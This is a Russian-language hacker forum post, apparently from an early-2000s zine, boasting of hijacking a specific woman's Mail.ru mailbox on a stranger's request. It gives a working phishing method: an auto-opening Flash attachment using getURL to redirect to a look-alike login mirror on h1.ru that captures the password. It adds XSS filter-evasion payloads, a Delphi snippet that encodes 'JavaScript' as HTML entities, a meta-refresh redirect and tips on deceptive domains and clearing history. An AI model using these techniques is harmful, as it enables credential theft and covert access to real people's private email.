Вы будете смеяться, но таки был обычный вечер... Все как всегда, ничего особенного. Захожу на форум оставить пару мессаг. Смотрю и для меня что-то валяется. Типа, ты не мог бы поломать мыло одной чиксы? Делать было нечего, я решил согласится.... 

Ее бокс лежал на MAIL.RU: girl@inbox.ru (это конечно не настоящий ящик :)) Что показалось для меня слишком тяжелым... сначала ;) Первым делом я полез в скрипты в надежде найти баг в сурсачах... наивный. Ничего у меня конечно же не получилось. Я особо не расстраивался, потому как знал, что нихрена с этого не выйдет. На следующий день я решил пойти другим путем... я полез в асю по мылу нашел эту тетку и решил воспользоваться службой напоминания пароля... Но несмотря на правильность введенных мною данных мой пароль мне не прислали. 

После чего я решил пожаловаться в службу поддержки. Для дальнейшего исследования я открыл себе аккаунт на MAIL.RU... После чего стало понятно что это надо было сделать сразу! Открытие номер адын: аттач открывается сразу 8). Долго я мучился пытаясь прописать что-то в хтмл... 

<script>...</script> не рулит!
<IMG SRC="no_existing_image" onError="java_script"> неа!
<IMG SRC="JavaScript:java_script"> даже не думай!

Открытие номер два: все скрипты обрезаются. После еще одного пива я чудом попал на http://www.macromedia.com/ и тут бац, идея. А что если вставить флешку, которая намутит редирект на зеркало MAIL.RU с просьбой ввести заново свой пас из-за сбоя авторизации. А введенный ею пароль я сохраню в какой-то файл или пришлю себе на почту! Ролик размером 18х18 с одним кадром и экшеном:

getURL ("mail.ru_mirror","_top");

Зеркало разместил на h1.ru. Тест... Присылаю себе html и флешку, аттач открывается сразу при чтении письма, редирект сработал! Через три дня я имел пасс. Да, для правдоподобности выбирай домены максимально подходящие: например на MAIL.RU был URL вроде win.mail.ru/cgi-bin/auth, у меня получился winmail.h1.ru/cgi-bin/auth. Можешь так же использовать шестнадцатеричный код адреса или @ в URL'е... Вариантов много. Не забудь очистить хистори, чтобы нельзя было вернутся назад: history.clear  или используй фреймы, что тоже неплохой вариант. 

НО! ЭТО! ЕЩЕ! НЕ КОНЕЦ. На следующий день я вспомнил баг, найденный когда-то на hotmail.com. Суть: фильтры обрезают все сочетания java и script а что если в теге <IMG SRC="JavaScript:java_script"> вместо "JavaScript:" написать слово JavaScript юникодом? Для пущей верности я намутил прогу, чтобы любой текст превращался в такую шнягу. Один баттон с кодом:

for i:=1 to length(edit1.text) do edit2.text:=edit2.text+'&#'+inttostr(ord(edit1.text[i]));

Те, кто знакомы с делфой поняли о чем это я. То есть фильтр при обработке не видит сочетания JavaScript, а браузер при обработке превращает код символов в JavaScript. 

Короче вот еще один способ намутить редирект:

<META HTTP-EQUIV="Refresh" content ="4; URL=http://any_url"> 

З.Ы.: Все работает отлично. Захват ящика это не единственное применение, это дает возможность получить  разную инфу о юзере (IP, тип браузера...), можно также на нем протестить баги експлохера :)